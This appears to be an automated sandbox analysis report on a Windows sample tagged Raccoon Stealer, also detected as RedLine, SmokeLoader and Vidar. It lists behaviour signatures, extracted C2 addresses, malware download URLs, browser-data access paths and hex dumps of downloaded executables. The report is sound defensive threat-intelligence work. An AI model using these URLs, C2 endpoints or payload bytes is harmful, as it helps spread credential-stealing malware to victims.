Windows Analysis Report y8WngeDn4q.exe

Overview

General Information

Sample Name: y8WngeDn4q.exe
Analysis ID: 511828
MD5: 2ba5d1028f7babca366060bde97bf482
SHA1: 98c817b375bb002c37c8dfb778116e4c5d07cd79
SHA256: 555fd11933a1bb3a71714e1c234cdeaf7ea3c614f24eebec3786fb61cb3b5b5e
Tags: exeRaccoonStealer
Infos:

Most interesting Screenshot:

Detection

Raccoon RedLine SmokeLoader Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected AntiVM3
Yara detected Vidar
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Found malware configuration
Yara detected UAC Bypass using CMSTP
DLL reload attack detected
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Writes to foreign memory regions
Renames NTDLL to bypass HIPS
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Sigma detected: Powershell Defender Exclusion
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 29.3.E4D7.exe.48e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.E4D7.exe.48e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.E4D7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.E4D7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000002.649599129.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.553896826.00000000048E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: E4D7.exe PID: 6552, type: MEMORYSTR
Antivirus detection for URL or domain
Source: http://sysaheu90.top/game.exe Avira URL Cloud: Label: malware
Source: http://znpst.top/dl/buildz.exe Avira URL Cloud: Label: malware
Source: http://privacytoolzforyou-6000.top/downloads/toolspab2.exe Avira URL Cloud: Label: malware
Source: http://toptelete.top/agrybirdsgamerept Avira URL Cloud: Label: malware
Source: http://hajezey1.top/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 0000001B.00000002.558722900.00000000048B0000.00000004.00000001.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://193.56.146.214/", "https://193.56.146.214/"]}
Source: 34.0.DataSvcUtil.exe.400000.1.unpack Malware Configuration Extractor: RedLine {"C2 url": ["45.9.20.149:10844"], "Bot Id": ""}
Multi AV Scanner detection for submitted file
Source: y8WngeDn4q.exe Virustotal: Detection: 36% Perma Link
Multi AV Scanner detection for domain / URL
Source: privacytoolzforyou-6000.top Virustotal: Detection: 5% Perma Link
Source: http://sysaheu90.top/game.exe Virustotal: Detection: 16% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\37D8.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\3AE.exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe ReversingLabs: Detection: 22%
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\60DF.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\B74C.exe ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\Temp\C651.exe ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\D083.exe ReversingLabs: Detection: 32%
Machine Learning detection for sample
Source: y8WngeDn4q.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\E11F.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DAA6.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B74C.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FBAD.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\gbdfufc Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\csdfufc Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\esdfufc Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FC0C.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8908.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C651.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D083.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 15.0.8908.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.8908.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.0.esdfufc.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.0.esdfufc.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.8908.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.0.esdfufc.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.0.esdfufc.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.8908.exe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 37D8.exe PID: 6468, type: MEMORYSTR

Compliance:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe Unpacked PE file: 29.2.E4D7.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\C651.exe Unpacked PE file: 41.2.C651.exe.400000.0.unpack
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.6:49835 version: TLS 1.0
Uses 32bit PE files
Source: y8WngeDn4q.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.6:49799 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.6:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 81.177.141.36:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: Binary string: C:\vojos\fuw.pdb source: 4EDC.exe, 00000016.00000002.528243755.0000000000417000.00000002.00020000.sdmp, csdfufc.6.dr
Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdbp source: DAA6.exe.6.dr
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000019.00000002.527231593.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001C.00000002.528560998.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000021.00000002.570535756.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000024.00000000.565833998.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.19.dr
Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdb source: DAA6.exe.6.dr
Source: Binary string: C:\ciwomo siju28 nijohon\93-loze\2.pdb source: 6E1E.exe, gbdfufc.6.dr
Source: Binary string: +C:\tuy.pdb` source: y8WngeDn4q.exe
Source: Binary string: C:\lewusukoviv.pdb source: FBAD.exe.6.dr
Source: Binary string: C:\tuy.pdb source: y8WngeDn4q.exe
Source: Binary string: wntdll.pdbUGP source: 4EDC.exe, 00000016.00000002.530995436.000000006BFE1000.00000020.00020000.sdmp, 1105.tmp.22.dr
Source: Binary string: wntdll.pdb source: 4EDC.exe, 1105.tmp.22.dr
Source: Binary string: `C:\ciwomo siju28 nijohon\93-loze\2.pdb` source: 6E1E.exe, 0000001B.00000000.521192744.0000000000401000.00000020.00020000.sdmp, gbdfufc.6.dr
Source: Binary string: bC:\ciyomolibit\vowudavumaz68\fubevu\vatatageh\yayawav\duji.pdb` source: E4D7.exe.6.dr
Source: Binary string: :C:\venu4-divilavujar1.pdb` source: B74C.exe.6.dr
Source: Binary string: C:\lewusukoviv.pdb` source: FBAD.exe.6.dr
Source: Binary string: C:\tosofom\yopuk.pdb source: C651.exe.6.dr
Source: Binary string: C:\venu4-divilavujar1.pdb source: B74C.exe.6.dr
Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxzip32\Release\sfxzip.pdb source: E11F.exe.6.dr
Source: Binary string: C:\ciyomolibit\vowudavumaz68\fubevu\vatatageh\yayawav\duji.pdb source: E4D7.exe.6.dr
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.6:49859 -> 194.180.174.181:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: iyc.jelikob.ru
Source: C:\Windows\explorer.exe Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe Domain query: znpst.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe Domain query: hajezey1.top
Source: C:\Windows\explorer.exe Domain query: sysaheu90.top
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://193.56.146.214/
Source: Malware configuration extractor URLs: https://193.56.146.214/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903333369742491648/1E88D378.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 132Host: 194.180.174.181
Source: global traffic HTTP traffic detected: GET //l/f/UJ1rynwB3dP17Spz23JR/c8a165d96af5f02e4cac679a1908533dbdcac0e8 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 15:54:58 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 15:54:01 GMTETag: "54e00-5cf7fd603d2d5"Accept-Ranges: bytesContent-Length: 347648Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 34 de 0b c3 70 bf 65 90 70 bf 65 90 70 bf 65 90 1f c9 ce 90 5c bf 65 90 1f c9 fb 90 52 bf 65 90 1f c9 cf 90 f0 bf 65 90 79 c7 f6 90 77 bf 65 90 70 bf 64 90 0f bf 65 90 1f c9 ca 90 71 bf 65 90 1f c9 ff 90 71 bf 65 90 1f c9 f8 90 71 bf 65 90 52 69 63 68 70 bf 65 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5e 32 52 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 cc 03 00 00 c4 70 02 00 00 00 00 f0 ca 01 00 00 10 00 00 00 e0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 74 02 00 04 00 00 a1 ce 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 cf 03 00 50 00 00 00 00 60 73 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 73 02 84 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 bf 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 ca 03 00 00 10 00 00 00 cc 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 e0 03 00 00 16 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 7a 65 67 75 00 00 00 e5 02 00 00 00 50 73 02 00 04 00 00 00 e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 60 73 02 00 40 00 00 00 ea 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 cc 23 01 00 00 a0 73 02 00 24 01 00 00 2a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 15:55:37 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 15:55:02 GMTETag: "93200-5cf7fd9a22b51"Accept-Ranges: bytesContent-Length: 602624Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 34 de 0b c3 70 bf 65 90 70 bf 65 90 70 bf 65 90 1f c9 ce 90 5c bf 65 90 1f c9 fb 90 52 bf 65 90 1f c9 cf 90 f0 bf 65 90 79 c7 f6 90 77 bf 65 90 70 bf 64 90 0f bf 65 90 1f c9 ca 90 71 bf 65 90 1f c9 ff 90 71 bf 65 90 1f c9 f8 90 71 bf 65 90 52 69 63 68 70 bf 65 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6a f3 b3 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 b0 07 00 00 c4 70 02 00 00 00 00 90 af 05 00 00 10 00 00 00 c0 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 78 02 00 04 00 00 05 90 09 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 b4 07 00 50 00 00 00 00 40 77 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 77 02 84 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 a4 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 af 07 00 00 10 00 00 00 b0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 c0 07 00 00 16 00 00 00 b4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 69 66 00 00 00 00 e5 02 00 00 00 30 77 02 00 04 00 00 00 ca 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 40 77 02 00 40 00 00 00 ce 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 cc 23 01 00 00 80 77 02 00 24 01 00 00 0e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 15:56:05 GMTServer: Apache/2.4.6 (CentOS) PHP/5.6.40Last-Modified: Fri, 29 Oct 2021 15:50:01 GMTETag: "d6400-5cf7fc7b02802"Accept-Ranges: bytesContent-Length: 877568Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 34 de 0b c3 70 bf 65 90 70 bf 65 90 70 bf 65 90 1f c9 ce 90 5c bf 65 90 1f c9 fb 90 52 bf 65 90 1f c9 cf 90 f0 bf 65 90 79 c7 f6 90 77 bf 65 90 70 bf 64 90 0f bf 65 90 1f c9 ca 90 71 bf 65 90 1f c9 ff 90 71 bf 65 90 1f c9 f8 90 71 bf 65 90 52 69 63 68 70 bf 65 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 16 64 3f 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 e2 0b 00 00 c4 70 02 00 00 00 00 f0 e1 09 00 00 10 00 00 00 00 0c 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 7c 02 00 04 00 00 34 7c 0d 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 e6 0b 00 50 00 00 00 00 80 7b 02 68 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 7b 02 90 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 d6 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 e1 0b 00 00 10 00 00 00 e2 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 00 0c 00 00 16 00 00 00 e6 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 79 6f 70 75 00 00 00 e5 02 00 00 00 70 7b 02 00 04 00 00 00 fc 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 3f 00 00 00 80 7b 02 00 40 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 cc 23 01 00 00 c0 7b 02 00 24 01 00 00 40 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 15:56:11 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 